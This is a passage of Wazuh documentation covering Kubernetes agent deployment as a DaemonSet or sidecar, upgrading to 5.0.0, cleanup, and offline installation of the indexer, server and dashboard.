                  ls -l /agent/etc/authd.pass
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
                - name: wazuh-authd-pass
                  mountPath: /secret/authd.pass
                  subPath: authd.pass
                  readOnly: true
    
          #        MAIN CONTAINER
          containers:
            - name: wazuh-agent
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  ln -sf /var/ossec/etc/ossec.conf /etc/ossec.conf || true
                  exec /init
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: NODE_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: spec.nodeName
              securityContext:
                runAsUser: 0
                allowPrivilegeEscalation: true
                capabilities:
                  add: ["SETGID","SETUID"]
              volumeMounts:
                - name: varlog
                  mountPath: /var/log
                  readOnly: true
                - name: ossec-data
                  mountPath: /var/ossec
    
          #            VOLUMES
          volumes:
            - name: varlog
              hostPath:
                path: /var/log
                type: Directory
            - name: ossec-data
              hostPath:
                path: /var/lib/wazuh
                type: DirectoryOrCreate
            - name: wazuh-authd-pass
              secret:
                secretName: wazuh-authd-pass
    

    Replace:

    • <EXTERNAL_IP_WAZUH_WORKER> with the External IP of the wazuh-workers load balancer.

    • <EXTERNAL_IP_WAZUH> with the External IP of the wazuh load balancer.

  2. Create the namespace:

    $ kubectl create namespace wazuh-daemonset
    
  3. Create the Kubernetes secret for the enrollment password:

    $ kubectl create secret generic wazuh-authd-pass \
      -n wazuh-daemonset \
      --from-literal=authd.pass=password
    

    Note

    The default password for enrolling the Wazuh agent in your Kubernetes cluster is password. This value is stored in the /var/ossec/etc/authd.pass file on the Wazuh Manager. For more information, see Using password authentication documentation.

  4. Deploy the Wazuh agent:

    $ kubectl apply -f wazuh-agent-daemonset.yaml
    
  5. Verify that the Wazuh agent was deployed across all nodes with the following command:

    $ kubectl get pods -n wazuh-daemonset -o wide
    
    NAME                READY   STATUS    RESTARTS   AGE   IP          NODE     NOMINATED NODE   READINESS GATES
    wazuh-agent-t2fwl   1/1     Running   0          21m   10.42.0.9   server   <none>           <none>
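
    To further confirm that the agents enrolled successfully, you can inspect their logs using the app=wazuh-agent label defined in the DaemonSet:

    $ kubectl logs -n wazuh-daemonset -l app=wazuh-agent --tail=20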
    
Deploying the Wazuh Agent as a Sidecar

The sidecar approach is ideal for targeted monitoring of sensitive applications or workloads that require isolated log collection. Perform the steps below to deploy Wazuh as a Sidecar:

  1. Modify your application's deployment to include the Wazuh agent container. In the example below, we deploy Wazuh alongside the Apache Tomcat application from the wazuh-agent-sidecar.yaml deployment file:

    apiVersion: v1
    kind: Namespace
    metadata:
      name: wazuh-sidecar
    ---
    apiVersion: apps/v1
    kind: StatefulSet
    metadata:
      name: tomcat-wazuh-agent
      namespace: wazuh-sidecar
    spec:
      serviceName: tomcat-app
      replicas: 1
      selector:
        matchLabels:
          app: tomcat-wazuh-agent
      template:
        metadata:
          labels:
            app: tomcat-wazuh-agent
        spec:
          terminationGracePeriodSeconds: 20
          securityContext:
            fsGroup: 999
            fsGroupChangePolicy: OnRootMismatch
    
          #        INIT CONTAINERS
          initContainers:
            - name: cleanup-ossec-stale
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  mkdir -p /agent/var/run /agent/queue/ossec
                  rm -f /agent/var/run/*.pid || true
                  rm -f /agent/queue/ossec/*.lock || true
                  echo "Cleanup complete. Ready for next init step."
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
    
            - name: seed-ossec-tree
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  if [ ! -d /agent/bin ]; then
                    echo "Seeding /var/ossec into PVC..."
                    tar -C /var/ossec -cf - . | tar -C /agent -xpf -
                  else
                    echo "Existing Wazuh data found, skipping seed."
                  fi
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
    
            - name: write-ossec-config
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: WAZUH_PORT
                  value: "1514"
                - name: WAZUH_PROTOCOL
                  value: "tcp"
                - name: WAZUH_REGISTRATION_SERVER
                  value: "<EXTERNAL_IP_WAZUH>"
                - name: WAZUH_REGISTRATION_PORT
                  value: "1515"
                - name: WAZUH_AGENT_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: metadata.name
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  mkdir -p /agent/etc
                  cat > /agent/etc/ossec.conf <<'EOF'
                  <ossec_config>
                    <client>
                      <server>
                        <address>${WAZUH_MANAGER}</address>
                        <port>${WAZUH_PORT}</port>
                        <protocol>${WAZUH_PROTOCOL}</protocol>
                      </server>
                      <enrollment>
                        <enabled>yes</enabled>
                        <agent_name>${WAZUH_AGENT_NAME}</agent_name>
                        <manager_address>${WAZUH_REGISTRATION_SERVER}</manager_address>
                        <port>${WAZUH_REGISTRATION_PORT}</port>
                        <authorization_pass_path>/var/ossec/etc/authd.pass</authorization_pass_path>
                      </enrollment>
                    </client>
                    <localfile>
                      <log_format>syslog</log_format>
                      <location>/usr/local/tomcat/logs/catalina.out</location>
                    </localfile>
                  </ossec_config>
                  EOF
    
                  sed -i \
                    -e "s|\${WAZUH_MANAGER}|${WAZUH_MANAGER}|g" \
                    -e "s|\${WAZUH_PORT}|${WAZUH_PORT}|g" \
                    -e "s|\${WAZUH_PROTOCOL}|${WAZUH_PROTOCOL}|g" \
                    -e "s|\${WAZUH_REGISTRATION_SERVER}|${WAZUH_REGISTRATION_SERVER}|g" \
                    -e "s|\${WAZUH_REGISTRATION_PORT}|${WAZUH_REGISTRATION_PORT}|g" \
                    -e "s|\${WAZUH_AGENT_NAME}|${WAZUH_AGENT_NAME}|g" \
                    /agent/etc/ossec.conf
    
                  chown 999:999 /agent/etc/ossec.conf
                  chmod 0640 /agent/etc/ossec.conf
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
    
            - name: fix-authd-pass-perms
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "Copying authd.pass from Secret..."
                  mkdir -p /agent/etc
                  cp /secret/authd.pass /agent/etc/authd.pass
                  chown 0:999 /agent/etc/authd.pass
                  chmod 0640 /agent/etc/authd.pass
                  ls -l /agent/etc/authd.pass
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
                - name: wazuh-authd-pass
                  mountPath: /secret/authd.pass
                  subPath: authd.pass
                  readOnly: true
    
    
          #        MAIN CONTAINERS
          containers:
            - name: tomcat
              image: tomcat:10.1-jdk17
              imagePullPolicy: IfNotPresent
              ports:
                - containerPort: 8080
              volumeMounts:
                - name: application-data
                  mountPath: /usr/local/tomcat/logs
            - name: wazuh-agent
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              lifecycle:
                preStop:
                  exec:
                    command: ["/bin/sh", "-lc", "/var/ossec/bin/ossec-control stop || true; sleep 2"]
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  ln -sf /var/ossec/etc/ossec.conf /etc/ossec.conf
                  exec /init
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: WAZUH_PORT
                  value: "1514"
                - name: WAZUH_PROTOCOL
                  value: "tcp"
                - name: WAZUH_REGISTRATION_SERVER
                  value: "<EXTERNAL_IP_WAZUH>"
                - name: WAZUH_REGISTRATION_PORT
                  value: "1515"
                - name: WAZUH_AGENT_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: metadata.name
              securityContext:
                runAsUser: 0
                runAsGroup: 0
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /var/ossec
                - name: application-data
                  mountPath: /usr/local/tomcat/logs
    
          #            VOLUMES
          volumes:
            - name: wazuh-authd-pass
              secret:
                secretName: wazuh-authd-pass
      volumeClaimTemplates:
        - metadata:
            name: wazuh-agent-data
          spec:
            accessModes: ["ReadWriteOnce"]
            storageClassName: gp2  # Adjust according to your cluster's StorageClass
            resources:
              requests:
                storage: 3Gi
        - metadata:
            name: application-data
          spec:
            accessModes: ["ReadWriteOnce"]
            storageClassName: gp2  # Adjust according to your cluster's StorageClass
            resources:
              requests:
                storage: 5Gi
    ---
    apiVersion: v1
    kind: Service
    metadata:
      name: tomcat-app
      namespace: wazuh-sidecar
    spec:
      selector:
        app: tomcat-wazuh-agent
      type: NodePort
      ports:
        - protocol: TCP
          port: 80
          targetPort: 8080
          nodePort: 30013
    

    Note

    Before applying the manifest, confirm the StorageClass names in your cluster by running the command kubectl get sc. In this example, the cluster uses the gp2 StorageClass.

    Replace:

    • <EXTERNAL_IP_WAZUH_WORKER> with the External IP of the wazuh-workers load balancer.

    • <EXTERNAL_IP_WAZUH> with the External IP of the wazuh load balancer.

  2. Create the namespace for the Wazuh agent and the Tomcat application:

    # kubectl create namespace wazuh-sidecar
    
  3. Create the Kubernetes secret for the enrollment password:

    $ kubectl create secret generic wazuh-authd-pass \
      -n wazuh-sidecar \
      --from-literal=authd.pass=password
    

    Note

    The default password for enrolling the Wazuh agent in your Kubernetes cluster is password. This value is stored in the /var/ossec/etc/authd.pass file on the Wazuh Manager. For more information, see Using password authentication documentation.

  4. Deploy the sidecar setup:

    # kubectl apply -f wazuh-agent-sidecar.yaml
    
  5. Run the command below to confirm that the tomcat-wazuh-agent pod is running:

    # kubectl get pods -n wazuh-sidecar
    
    NAME                           READY   STATUS     RESTARTS   AGE
    tomcat-wazuh-agent-0           2/2     Running    0          18s
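
    You can also check the logs of the wazuh-agent sidecar container to confirm that it enrolled with the manager:

    # kubectl logs -n wazuh-sidecar tomcat-wazuh-agent-0 -c wazuh-agent --tail=20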
    
Upgrade Wazuh installed in Kubernetes

This section provides a guide to upgrading your Wazuh deployment in a Kubernetes environment while preserving existing configurations and data. Because Wazuh uses persistent volumes and Docker-based components, updates can be performed seamlessly without losing prior settings or logs.

Check files exported to the volume

The Kubernetes deployment uses Wazuh Docker images. The following directories and files are used in the upgrade:

/var/ossec/api/configuration
/var/ossec/etc
/var/ossec/logs
/var/ossec/queue
/var/ossec/var/multigroups
/var/ossec/integrations
/var/ossec/active-response/bin
/var/ossec/agentless
/var/ossec/wodles
/etc/filebeat
/var/lib/filebeat
/usr/share/wazuh-dashboard/config/
/usr/share/wazuh-dashboard/certs/
/var/lib/wazuh-indexer
/usr/share/wazuh-indexer/config/certs/
/usr/share/wazuh-indexer/config/opensearch.yml
/usr/share/wazuh-indexer/config/opensearch-security/internal_users.yml

Any modifications to these files are also made in the associated volume. When a replica pod is created, it gets those files from the volume, keeping the previous changes.

Recreating certificates

Upgrading from a version earlier than v4.8.0 requires you to recreate the SSL certificates. Clone the wazuh-kubernetes repository and check out the v5.0.0 tag. Then, follow the instructions in Setup SSL certificates.

Configuring the upgrade

To upgrade to version 5.0.0, you can follow one of two strategies.

  • Using default manifests : This strategy uses the default manifests for Wazuh 5.0. It replaces the wazuh-kubernetes manifests of your outdated Wazuh version.

  • Keeping custom manifests : This strategy preserves the wazuh-kubernetes manifests of your outdated Wazuh deployment. It ignores the manifests of the latest Wazuh version.

Using default manifests

To upgrade your deployment using the default manifests, perform the following steps.

  1. Check out the tag for the version of wazuh-kubernetes you are upgrading to:

    # git checkout v5.0.0
    
  2. Apply the new configuration.

Keeping custom manifests

The following approach allows administrators to preserve their existing deployment configurations instead of overwriting them with the default manifests from the new version. This method is ideal for environments with custom settings, resource allocations, network policies, or integrations that must remain intact during the upgrade.

The upgrade process differs slightly depending on your current Wazuh version.

  1. If you are upgrading from version 4.3, update the Java Opts variable name with the new one.

  2. Update old paths with the new ones.

  3. If you are upgrading from a version earlier than 4.8, update configuration parameters.

  4. Modify tags of Wazuh images.

Next, apply the new configuration.

Updating Java Opts variable name
  1. If you are upgrading from version 4.3, you must replace ES_JAVA_OPTS with OPENSEARCH_JAVA_OPTS and modify the value.

    • wazuh/wazuh_managers/wazuh-master-sts.yaml

      env:
        - name: OPENSEARCH_JAVA_OPTS
          value: '-Xms1g -Xmx1g -Dlog4j2.formatMsgNoLookups=true'
      
Updating old paths

Wazuh dashboard

  1. Edit wazuh/indexer_stack/wazuh-dashboard/dashboard-deploy.yaml and do the following replacements.

    • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

  2. Edit wazuh/indexer_stack/wazuh-dashboard/dashboard_conf/opensearch_dashboards.yml and do the following replacements.

    • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

Wazuh indexer

  1. Edit wazuh/indexer_stack/wazuh-indexer/cluster/indexer-sts.yaml and do the following replacements.

    • Replace /usr/share/wazuh-indexer/plugins/opensearch-security/securityconfig/ with /usr/share/wazuh-indexer/opensearch-security/.

    • Add the following statements:

      volumes:
      - name: indexer-certs
         secret:
            secretName: indexer-certs
            defaultMode: 0600
      - name: indexer-conf
         configMap:
            name: indexer-conf
            defaultMode: 0600
      
      spec:
         securityContext:
           fsGroup: 1000
         # Set the wazuh-indexer volume permissions so the wazuh-indexer user can use it
         volumes:
         - name: indexer-certs
      
      securityContext:
         runAsUser: 1000
         runAsGroup: 1000
         capabilities:
            add: ["SYS_CHROOT"]
      
Updating configuration parameters
  1. Update the defaultRoute parameter in the Wazuh dashboard configuration.

    • wazuh/indexer_stack/wazuh-dashboard/dashboard_conf/opensearch_dashboards.yml.

      uiSettings.overrides.defaultRoute: /app/wz-home
      
  2. Edit opensearch.yml and modify the CN for the Wazuh indexer.

    • wazuh/indexer_stack/wazuh-indexer/indexer_conf/opensearch.yml

      plugins.security.nodes_dn:
        - CN=indexer,O=Company,L=California,C=US
      
  3. Edit the following files and modify all Wazuh indexer URLs in the deployment.

    • wazuh/indexer_stack/wazuh-dashboard/dashboard-deploy.yaml

      env:
        - name: INDEXER_URL
          value: 'https://indexer:9200'
      
    • wazuh/wazuh_managers/wazuh-master-sts.yaml

      env:
        - name: INDEXER_URL
          value: 'https://indexer:9200'
      
    • wazuh/wazuh_managers/wazuh-worker-sts.yaml

      env:
        - name: INDEXER_URL
          value: 'https://indexer:9200'
      
  4. Edit the following files of the v5.0.0 tag and apply all the customizations from your Wazuh manager ossec.conf file.

    • wazuh/wazuh_managers/wazuh_conf/master.conf

    • wazuh/wazuh_managers/wazuh_conf/worker.conf

Modifying tags of Wazuh images

Modify the tag of Wazuh images in the different statefulsets and deployments.

image: 'wazuh/wazuh-dashboard:5.0.0'
image: 'wazuh/wazuh-manager:5.0.0'
image: 'wazuh/wazuh-indexer:5.0.0'
Apply the new configuration

The last step is to apply the new configuration:

  • EKS cluster

    $ kubectl apply -k envs/eks/
    
  • Other cluster types

    $ kubectl apply -k envs/local-env/
    
 statefulset.apps "wazuh-manager-master" configured

This process terminates the old pods and creates new ones running the new version, attached to the same volumes. Once the pods are up, the upgrade is complete: you can verify the new Wazuh version, check the cluster status, and confirm that your previous changes were preserved through the volumes.
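
For example, you can confirm that the workloads are now running the new image tags:

$ kubectl get statefulsets,deployments -n wazuh -o wide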

Clean Up

When you no longer need your Wazuh Kubernetes deployment or want a fresh deployment, it is important to properly remove all resources to prevent orphaned configurations or volumes from consuming cluster resources.

This section outlines the steps required to completely clean up your environment, including deleting StatefulSets, services, ConfigMaps, and persistent volumes associated with the Wazuh cluster.

Follow the steps below to delete all deployments, services, and volumes.

  1. Remove the entire cluster

    The deployment of the Wazuh cluster of managers involves the use of different StatefulSet elements as well as configuration maps and services.

    To delete your Wazuh cluster, execute the following command from the repository directory.

    • EKS cluster

      $ kubectl delete -k envs/eks/
      
    • Other cluster types

      $ kubectl delete -k envs/local-env/
      

    This removes every resource defined in the kustomization.yml file.

  2. Remove the persistent volumes.

    $ kubectl get persistentvolume
    
    NAME                                       CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS        CLAIM                                                         STORAGECLASS             REASON    AGE
    pvc-024466da-f7c5-11e8-b9b8-022ada63b4ac   10Gi       RWO            Retain           Released      wazuh/wazuh-manager-worker-wazuh-manager-worker-1-0           gp2-encrypted-retained             6d
    pvc-b3226ad3-f7c4-11e8-b9b8-022ada63b4ac   30Gi       RWO            Retain           Bound         wazuh/wazuh-indexer-wazuh-indexer-0                           gp2-encrypted-retained             6d
    pvc-fb821971-f7c4-11e8-b9b8-022ada63b4ac   10Gi       RWO            Retain           Released      wazuh/wazuh-manager-master-wazuh-manager-master-0             gp2-encrypted-retained             6d
    pvc-ffe7bf66-f7c4-11e8-b9b8-022ada63b4ac   10Gi       RWO            Retain           Released      wazuh/wazuh-manager-worker-wazuh-manager-worker-0-0           gp2-encrypted-retained             6d
    
    $ kubectl delete persistentvolume pvc-b3226ad3-f7c4-11e8-b9b8-022ada63b4ac
    

    Repeat the kubectl delete command to delete all Wazuh related persistent volumes.
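
    If all remaining Wazuh persistent volumes should be removed, a one-liner similar to the following can save some typing. This is a convenience sketch that assumes the claims reference the wazuh namespace; review the list printed by kubectl get persistentvolume before deleting anything:

    $ kubectl get persistentvolume --no-headers | awk '$6 ~ /^wazuh\// {print $1}' | xargs -r kubectl delete persistentvolume
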

Warning

Do not forget to delete the volumes manually where necessary.

Offline installation guide

You can install Wazuh even without an Internet connection. Installing the solution offline involves first downloading the Wazuh central components on a system with Internet access, then transferring and installing them on the offline system. Wazuh supports both all-in-one and distributed deployments. The Wazuh server, indexer, and dashboard can run on the same host in an all-in-one setup, or be installed on separate hosts for a distributed deployment. It supports 64-bit architectures, including x86_64/AMD64 and AARCH64/ARM64.

For more information about the hardware requirements and the recommended operating systems, check the Requirements section.

Note

You need root user privileges to run all the commands described below.

Prerequisites
  • curl, tar, and setcap need to be installed in the target system where the offline installation will be carried out. gnupg might need to be installed as well for some Debian-based systems.

  • On some systems, the command cp is an alias for cp -i; you can check this by running alias cp. If this is your case, run unalias cp to avoid being asked for confirmation before overwriting files.

Download the packages and configuration files

From a Linux system with Internet access, run the script below to download all files needed for offline installation. Choose the package format (RPM or DEB) and architecture (x86_64/AMD64 or AARCH64/ARM64).

  1. Run the following commands on any Linux system with Internet access to download the Wazuh offline installer script and make it executable.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
    # chmod 744 wazuh-install.sh
    
  2. Download the packages for your architecture and package format. The examples below download RPM packages; for DEB-based systems, pass deb instead of rpm as the format argument.

    x86_64 / AMD64

    # ./wazuh-install.sh -dw rpm -da x86_64
    

    AARCH64 / ARM64

    # ./wazuh-install.sh -dw rpm -da aarch64
    
  3. Download the certificates configuration file.

    # curl -sO https://packages.wazuh.com/5.0/config.yml
    
  4. Edit config.yml to prepare the certificates creation.

    • If you are performing an all-in-one deployment, replace "<indexer-node-ip>", "<wazuh-manager-ip>", and "<dashboard-node-ip>" with 127.0.0.1.

    • If you are performing a distributed deployment, replace the node names and IP values with the corresponding names and IP addresses. You need to do this for all the Wazuh server, Wazuh indexer, and Wazuh dashboard nodes. Add as many node fields as needed.
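
    For the all-in-one case described above, the three placeholders can be replaced in a single pass. This is a convenience sketch that assumes config.yml is in the current working directory and uses the placeholder names quoted above:

    # sed -i 's/<indexer-node-ip>/127.0.0.1/; s/<wazuh-manager-ip>/127.0.0.1/; s/<dashboard-node-ip>/127.0.0.1/' config.yml
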

  5. Run the ./wazuh-install.sh -g command to create the certificates. For a multi-node cluster, these certificates need to be later deployed to all Wazuh instances in your cluster.

    # ./wazuh-install.sh -g
    
  6. Copy or move the following files to a directory on the host(s) from where the offline installation will be carried out. You can use scp for this.

    • wazuh-install.sh

    • wazuh-offline.tar.gz

    • wazuh-install-files.tar
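
    For example, the three files can be transferred in a single scp command. This is a sketch in which <USERNAME>, <OFFLINE_HOST_IP>, and <WORKING_DIRECTORY> are placeholders for your own values:

    # scp wazuh-install.sh wazuh-offline.tar.gz wazuh-install-files.tar <USERNAME>@<OFFLINE_HOST_IP>:<WORKING_DIRECTORY>
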

Next steps

Once the Wazuh files are ready and copied to the specified hosts, it is necessary to install the Wazuh components.

Please make sure that a copy of the wazuh-install-files.tar and wazuh-offline.tar.gz files, created during the initial configuration step, is placed in your working directory.

Install Wazuh components using the assisted method
Single-node offline installation

Install and configure the Wazuh central components on a single node with a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the Wazuh assisted installation method.

Note

You need root user privileges to run all the commands described below.

Please make sure that a copy of the wazuh-install-files.tar and wazuh-offline.tar.gz files, created during the initial configuration step, is placed in your working directory.

The following dependencies must be installed on the Wazuh single node.

  • coreutils

  • libcap

  1. To perform the offline installation of the Wazuh central components on a single node using the assisted method, run the installation script with the --offline-installation and -a options:

    # bash wazuh-install.sh --offline-installation -a
    

    Once the installation is finished, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
        User: admin
        Password: <ADMIN_PASSWORD>
    INFO: Installation finished.
    
  2. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_NODE_IP_ADDRESS>

    • Username: admin

    • Password: <ADMIN_PASSWORD>

Multi-node offline installation
Installing the Wazuh indexer

Install and configure the Wazuh indexer nodes on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture.

The following dependencies must be installed on the Wazuh indexer nodes.

  • coreutils

  1. Run the assisted installation method with the --offline-installation option to perform an offline installation. Use the option --wazuh-indexer and the node name to install and configure the Wazuh indexer. The node name must be the same one used in config.yml for the initial configuration, for example, node-1.

    # bash wazuh-install.sh --offline-installation --wazuh-indexer node-1
    

    Repeat this step for every Wazuh indexer node in your cluster. Then proceed with initializing your multi-node cluster in the next step.

  2. Run the Wazuh assisted installation with the --start-cluster option on any Wazuh indexer node to load the new certificates information and start the cluster.

    # bash wazuh-install.sh --offline-installation --start-cluster
    

    Note

    You only have to initialize the cluster once; there is no need to run this command on every node.

Testing the cluster installation
  1. Run the following command to get the admin password:

    # tar -axf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt -O | grep -P "\'admin\'" -A 1
    
  2. Run the following command to confirm that the installation is successful. Replace <ADMIN_PASSWORD> with the password obtained from the output of the previous command. Replace <WAZUH_INDEXER_IP_ADDRESS> with the configured Wazuh indexer IP address:

    # curl -k -u admin:<ADMIN_PASSWORD> https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
    {
      "name" : "node-1",
      "cluster_name" : "wazuh-cluster",
      "cluster_uuid" : "095jEW-oRJSFKLz5wmo5PA",
      "version" : {
        "number" : "7.10.2",
        "build_type" : "rpm",
        "build_hash" : "db90a415ff2fd428b4f7b3f800a51dc229287cb4",
        "build_date" : "2023-06-03T06:24:25.112415503Z",
        "build_snapshot" : false,
        "lucene_version" : "9.6.0",
        "minimum_wire_compatibility_version" : "7.10.0",
        "minimum_index_compatibility_version" : "7.0.0"
      },
      "tagline" : "The OpenSearch Project: https://opensearch.org/"
    }
    
  3. Verify that the cluster is running correctly. Replace <WAZUH_INDEXER_IP_ADDRESS> and <ADMIN_PASSWORD> in the following command, then execute it:

    # curl -k -u admin:<ADMIN_PASSWORD> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    
Installing the Wazuh server

On systems with yum as package manager, the following dependencies must be installed on the Wazuh server nodes.

  • libcap

  1. Run the assisted method with the --offline-installation option to perform an offline installation. Use the option --wazuh-server followed by the node name to install the Wazuh server. The node name must be the same one used in config.yml for the initial configuration, for example, wazuh-1.

    # bash wazuh-install.sh --offline-installation --wazuh-server wazuh-1
    

Your Wazuh server is now successfully installed. Repeat this step on every Wazuh server node.

Installing the Wazuh dashboard

The following dependencies must be installed on the Wazuh dashboard node.

  • libcap

  1. Run the assisted method with the --offline-installation option to perform an offline installation. Use the option --wazuh-dashboard and the node name to install and configure the Wazuh dashboard. The node name must be the same one used in config.yml for the initial configuration, for example, dashboard.

    # bash wazuh-install.sh --offline-installation --wazuh-dashboard dashboard
    

    The default TCP port for the Wazuh web user interface (dashboard) is 443. You can change this port using the optional parameter -p|--port <PORT_NUMBER>. Some recommended ports are 8443, 8444, 8080, 8888, and 9000.
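
    For example, to install the dashboard on port 8443 instead of the default port, the command from the previous step would look like this:

    # bash wazuh-install.sh --offline-installation --wazuh-dashboard dashboard -p 8443
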

    Once the assistant finishes the installation, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
       User: admin
       Password: <ADMIN_PASSWORD>
    
    INFO: Installation finished.
    

    You have now installed and configured Wazuh. All passwords generated by the Wazuh installation assistant can be found in the wazuh-passwords.txt file inside the wazuh-install-files.tar archive. To print them, run the following command:

    # tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt
    
  2. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: <ADMIN_PASSWORD>

    When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser. For increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser instead. Alternatively, a certificate from a trusted authority can be configured.

Install Wazuh components step by step
  1. In the working directory where you placed wazuh-offline.tar.gz and wazuh-install-files.tar, execute the following command to decompress the installation files:

    # tar xf wazuh-offline.tar.gz
    # tar xf wazuh-install-files.tar
    

    You can check the SHA512 of the decompressed package files in wazuh-offline/wazuh-packages/. Find the SHA512 checksums in the Packages list.

Installing the Wazuh indexer

The following dependencies must be installed on the Wazuh indexer nodes.

  • coreutils

  1. Run the following commands to install the Wazuh indexer.

    # rpm --import ./wazuh-offline/wazuh-files/GPG-KEY-WAZUH
    # rpm -ivh ./wazuh-offline/wazuh-packages/wazuh-indexer*.rpm
    
  2. Run the following commands replacing <INDEXER_NODE_NAME> with the name of the Wazuh indexer node you are configuring as defined in config.yml. For example, node-1. This deploys the SSL certificates to encrypt communications between the Wazuh central components.

    # NODE_NAME=<INDEXER_NODE_NAME>
    
    # mkdir /etc/wazuh-indexer/certs
    # mv -n wazuh-install-files/$NODE_NAME.pem /etc/wazuh-indexer/certs/indexer.pem
    # mv -n wazuh-install-files/$NODE_NAME-key.pem /etc/wazuh-indexer/certs/indexer-key.pem
    # mv wazuh-install-files/admin-key.pem /etc/wazuh-indexer/certs/
    # mv wazuh-install-files/admin.pem /etc/wazuh-indexer/certs/
    # cp wazuh-install-files/root-ca.pem /etc/wazuh-indexer/certs/
    # chmod 500 /etc/wazuh-indexer/certs
    # chmod 400 /etc/wazuh-indexer/certs/*
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/certs
    

    Here you move the node certificate and key files, such as node-1.pem and node-1-key.pem, to their corresponding certs folder. They're specific to the node and are not required on the other nodes. However, note that the root-ca.pem certificate isn't moved but copied to the certs folder. This way, you can continue deploying it to other component folders in the next steps.
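
    If you want to double-check which Distinguished Name a node certificate carries, for example before filling in plugins.security.nodes_dn in the next step, you can inspect it with openssl, assuming the tool is available on the host:

    # openssl x509 -noout -subject -in /etc/wazuh-indexer/certs/indexer.pem
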

  3. Edit /etc/wazuh-indexer/opensearch.yml and replace the following values:

    1. network.host: Sets the address of this node for both HTTP and transport traffic. The node will bind to this address and will also use it as its publish address. Accepts an IP address or a hostname.

      Use the same node address set in config.yml to create the SSL certificates.

    2. node.name: Name of the Wazuh indexer node as defined in the config.yml file. For example, node-1.

    3. cluster.initial_master_nodes: List of the names of the master-eligible nodes. These names are defined in the config.yml file. Uncomment the node-2 and node-3 lines, change the names, or add more lines, according to your config.yml definitions.

      cluster.initial_master_nodes:
      - "node-1"
      - "node-2"
      - "node-3"
      
    4. discovery.seed_hosts: List of the addresses of the master-eligible nodes. Each element can be either an IP address or a hostname. You may leave this setting commented if you are configuring the Wazuh indexer as a single-node. For multi-node configurations, uncomment this setting and set your master-eligible nodes addresses.

      discovery.seed_hosts:
        - "10.0.0.1"
        - "10.0.0.2"
        - "10.0.0.3"
      
    5. plugins.security.nodes_dn: List of the Distinguished Names of the certificates of all the Wazuh indexer cluster nodes. Uncomment the lines for node-2 and node-3 and change the common names (CN) and values according to your settings and your config.yml definitions.

      plugins.security.nodes_dn:
      - "CN=node-1,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-2,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-3,OU=Wazuh,O=Wazuh,L=California,C=US"
      
  4. Enable and start the Wazuh indexer service.

    # systemctl daemon-reload
    # systemctl enable wazuh-indexer
    # systemctl start wazuh-indexer
    
  5. For multi-node clusters, repeat the previous steps on every Wazuh indexer node.

  6. When all Wazuh indexer nodes are running, run the Wazuh indexer indexer-security-init.sh script on any Wazuh indexer node to load the new certificates information and start the cluster.

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh
    
  7. Run the following command to check that the installation is successful. Note that this command uses 127.0.0.1; set your Wazuh indexer address if necessary.

    # curl -XGET https://127.0.0.1:9200 -u admin:admin -k
    

    Expand the output to see an example response.

Installing the Wazuh server

On systems with apt as package manager, the following dependencies must be installed on the Wazuh server nodes.

  • gnupg

  • apt-transport-https

  1. Run the following commands to import the Wazuh key and install the Wazuh manager.

    # rpm --import ./wazuh-offline/wazuh-files/GPG-KEY-WAZUH
